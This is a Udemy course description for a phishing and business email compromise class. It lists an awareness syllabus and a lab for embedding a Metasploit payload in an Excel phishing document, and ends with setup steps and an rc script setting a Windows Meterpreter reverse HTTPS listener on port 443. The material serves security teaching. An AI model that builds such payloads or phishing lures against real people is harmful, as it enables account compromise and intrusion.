[Basic to Advanced] - Phishing on Business Email Compromise
- 33 mins on-demand video
- 6 downloadable resources
- Full lifetime access
- Access on mobile and TV
- Certificate of Completion
Get your team access to 4,000+ top Udemy courses anytime, anywhere.Try Udemy for Business
- Security awareness on phishing attack.
- Technically make the demo on Phishing attack
- How hacker gather information to the target company ?
- Learn how to add payload to email and phishing
- How to educate the users to avoid being phishing
- Want to know prevention of phishing
- Basic usage of Kali Linux
- Basic understanding of Network connection of VMs
This course will cover the basic to advanced phishing techniques on business email compromise. You will learn the attack from attacker 's view and know how to defence.
For non - technical, please focus on General Security Awareness, you will learn a lot from phishing and understand how to defence it.
For technical, you can learn how to make a phishing email POC by meterpreter using MS excel. Also the latest phishing method "DDE" is also working in progress.
General Security Awareness topic:
- Basic information - What is Phishing ? Why Phishing is common? The scope is covered most basic information about phishing.
- Information Resources - Where do attackers get the information? It aims to let you know how attacker collect your information and how to prevent it.
- How to begin as email scammer - What will you do if you are scammers? Of course I will not recommend anyone to be scammer but if you understand how to make it, you will know how to defence it.
- What is spoof of Domain - Common Techniques, This Chapter is very good that I can show you what common techniques that attacker will use.
- How to defence - There are solutions from different roles.
A REAL Lab - how to setup phishing attack
This lab will teach you how to setup phishing attack plus below features:
a. Fileless attack and difficult to trace
b. 443 port attack and not easy to block
(Working in Progress)
Lab on how to setup DDE attack, you will know exact coding inside the document.
- College Students
- Cyber Security Professionals
Students can reference the excel file and do the demo as same as the video. Any questions can ask here, I can provide sample excel as well if needed.
1. Download the VMs and run in the same machine.
VM for Windows: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
Choose Windows 10 and suitable for your VM solution.'
VM for Kali : https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/
2. Download the zip file
Excel file store in Window VM
Payload file store in Kali VM
3. Create rc script file in Kali VM
set payload windows/meterpreter/reverse_https
set LHOST <<Kali VM ip address>>
set LPORT 443